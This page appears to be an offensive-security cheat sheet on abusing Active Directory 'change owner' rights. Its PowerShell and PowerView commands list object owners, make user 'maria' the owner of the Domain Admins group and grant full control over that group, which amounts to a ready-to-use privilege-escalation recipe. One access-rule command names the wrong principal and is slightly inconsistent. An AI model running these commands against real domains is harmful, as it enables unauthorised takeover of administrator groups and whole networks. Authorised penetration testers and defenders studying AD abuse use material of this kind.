AD Allowed to change owner

If you are allowed to change the owner on an object you are in a good place because owners have the right to update ACL. So you can set full control on a object.

Display owner with PowerShell

For bulk operations, it is therefore recommended to use PowerShell. If you first want to get an overview of multiple objects' ownership, there are several options available.

One approach is to generate a list of computer names and owners by expanding the nTSecurityDescriptor attribute using Select-Object:

Get-ADGroup -Filter * -properties ntSecurityDescriptor -PipelineVariable p | select -ExpandProperty ntSecurityDescriptor | select @{n="Computer";e={ $p.name }}, @{n="Owner";e={ $_.owner }}

Set owner

# MS AD Module
$user = new-object system.security.principal.ntaccount("object\maria")
Get-ADGroup -filter 'name -like "Domain Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$acl.SetOwner($user);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

# Powerview.ps1
# Powerview.ps1
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'

Set Full rights

# MS AD Module
$user = new-object system.security.principal.ntaccount("object\maria")
Get-ADGroup -filter 'name -like "Domain Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$ace = New-Object Security.AccessControl.ActiveDirectoryAccessRule('object.local\Domain Admins','FullControl');$acl.AddAccessRule($ace);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

#Powerview.ps1
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All

PreviousWriteDACL Rights NextAdd AD DNS entry Scripted Outbound Connection Found